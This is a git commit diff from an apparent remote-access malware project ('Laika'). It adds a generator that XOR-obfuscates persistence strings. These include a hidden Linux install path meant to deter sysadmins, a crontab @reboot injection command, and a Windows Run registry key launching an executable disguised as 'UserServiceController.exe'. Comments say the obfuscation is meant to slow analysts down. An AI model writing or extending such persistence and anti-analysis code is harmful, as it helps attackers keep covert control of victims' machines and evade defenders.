Implemented VMBoxes, linux persistence related strings are obfuscated, added VMBoxGen tool

- lboxconfig.h holds obfuscated data, which is generated by VMBoxGen - linpersist.c now uses obfuscated strings
2025-10-11 10:20:05 +00:00 · 2022-05-09 16:41:01 -05:00
parent 7ca855410d
commit 71db213261
11 changed files with 232 additions and 27 deletions
--- a/tools/vmboxgen/CMakeLists.txt
+++ b/tools/vmboxgen/CMakeLists.txt
@@ -0,0 +1,14 @@
+cmake_minimum_required(VERSION 3.10)
+
+project(VMBoxGen VERSION 1.0)
+
+# Put CMake targets (ALL_BUILD/ZERO_CHECK) into a folder
+set_property(GLOBAL PROPERTY USE_FOLDERS ON)
+
+# compile vmTest
+file(GLOB_RECURSE VMTESTSOURCE ${CMAKE_CURRENT_SOURCE_DIR}/src/**.c)
+add_executable(VMBoxGen ${VMTESTSOURCE})
+target_link_libraries(VMBoxGen PUBLIC LaikaLib)
+
+# add the 'DEBUG' preprocessor definition if we're compiling as Debug
+target_compile_definitions(VMBoxGen PUBLIC "$<$<CONFIG:Debug>:DEBUG>")
--- a/tools/vmboxgen/src/boxstrings.h
+++ b/tools/vmboxgen/src/boxstrings.h
@@ -0,0 +1,29 @@
+#ifndef LAIKA_BOXGEN_STRING_H
+#define LAIKA_BOXGEN_STRING_H
+
+/* =============================================[[ Linux Strings ]]============================================== */
+
+/*      we want a semi-random file lock that is stable between similar builds,
+*   so we use the GIT_VERSION as our file lock :D */
+#define LAIKA_LIN_LOCK_FILE "/tmp/" LAIKA_VERSION_COMMIT
+
+/* most sysadmins probably wouldn't dare remove something named '.sys/.update' */
+#define LAIKA_LIN_INSTALL_DIR ".sys"
+#define LAIKA_LIN_INSTALL_FILE ".update"
+
+#define LAIKA_LIN_CRONTAB_ENTRY "(crontab -l ; echo \"@reboot %s\")| crontab -"
+
+/* ============================================[[ Windows Strings ]]============================================= */
+
+/*      we want a semi-random mutex that is stable between similar builds,
+*   so we use the GIT_VERSION as our mutex :D */
+#define LAIKA_WIN_MUTEX LAIKA_VERSION_COMMIT ".0"
+
+/* looks official enough */
+#define LAIKA_WIN_INSTALL_DIR "Microsoft"
+#define LAIKA_WIN_INSTALL_FILE "UserServiceController.exe"
+
+#define LAIKA_WIN_REG_KEY "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+#define LAIKA_WIN_REG_VAL "UserServiceController"
+
+#endif
--- a/tools/vmboxgen/src/main.c
+++ b/tools/vmboxgen/src/main.c
@@ -0,0 +1,95 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <inttypes.h>
+
+#include "lmem.h"
+#include "lvm.h"
+#include "lbox.h"
+#include "lsodium.h"
+
+#include "boxstrings.h"
+
+#define ERR(...) do { printf(__VA_ARGS__); exit(EXIT_FAILURE); } while(0);
+#define RANDBYTE (rand() % UINT8_MAX)
+
+static const char *PREAMBLE = "/* file generated by VMBoxGen, see tools/vmboxgen/src/main.c */\n#ifndef LAIKA_VMBOX_CONFIG_H\n#define LAIKA_VMBOX_CONFIG_H\n\n";
+static const char *POSTAMBLE = "\n#endif\n";
+
+void writeArray(FILE *out, uint8_t *data, int sz) {
+    int i;
+
+    fprintf(out, "{");
+    for (i = 0; i < sz-1; i++) {
+        fprintf(out, "0x%02x, ", data[i]);
+    }
+    fprintf(out, "0x%02x};\n", data[sz-1]);
+}
+
+void writeDefineArray(FILE *out, char *ident, uint8_t *data) {
+    fprintf(out, "#define %s ", ident);
+    writeArray(out, data, LAIKA_VM_CODESIZE);
+}
+
+
+void writeDefineVal(FILE *out, char *ident, int data) {
+    fprintf(out, "#define %s 0x%02x\n", ident, data);
+}
+
+void addPadding(uint8_t *data, int start) {
+    int i;
+
+    /* if the box is less than LAIKA_VM_CODESIZE, add semi-random padding */
+    for (i = start; i < LAIKA_VM_CODESIZE; i++) {
+        data[i] = RANDBYTE;
+    }
+}
+
+uint8_t *makeSKIDdata(char *data, int sz, uint8_t *buff, int key) {
+    int i;
+
+    for (i = 0; i < sz; i++)
+        buff[i] = data[i] ^ key;
+
+    buff[i++] = key; /* add the null terminator */
+    addPadding(buff, i);
+    return buff;
+}
+
+#define MAKESKIDDATA(macro) \
+    key = RANDBYTE; \
+    makeSKIDdata(macro, strlen(macro), tmpBuff, key); \
+    writeDefineVal(out, #macro "_KEY", key); \
+    writeDefineArray(out, #macro "_DATA", tmpBuff);
+
+int main(int argv, char **argc) {
+    uint8_t tmpBuff[LAIKA_VM_CODESIZE];
+    int key;
+    FILE *out;
+
+    if (argv < 2)
+        ERR("USAGE: %s [OUTFILE]\n", argv > 0 ? argc[0] : "BoxGen");
+
+    if ((out = fopen(argc[1], "w+")) == NULL)
+        ERR("Failed to open %s!\n", argc[1]);
+
+    srand(time(NULL)); /* really doesn't need to be cryptographically secure, the point is only to slow them down */
+
+    fprintf(out, PREAMBLE);
+    /* linux */
+    MAKESKIDDATA(LAIKA_LIN_LOCK_FILE);
+    MAKESKIDDATA(LAIKA_LIN_INSTALL_DIR);
+    MAKESKIDDATA(LAIKA_LIN_INSTALL_FILE);
+    MAKESKIDDATA(LAIKA_LIN_CRONTAB_ENTRY);
+    /* windows */
+    MAKESKIDDATA(LAIKA_WIN_MUTEX);
+    MAKESKIDDATA(LAIKA_WIN_INSTALL_DIR);
+    MAKESKIDDATA(LAIKA_WIN_INSTALL_FILE);
+    MAKESKIDDATA(LAIKA_WIN_REG_KEY);
+    MAKESKIDDATA(LAIKA_WIN_REG_VAL);
+    fprintf(out, POSTAMBLE);
+    fclose(out);
+    return 0;
+}
+
+#undef MAKEDATA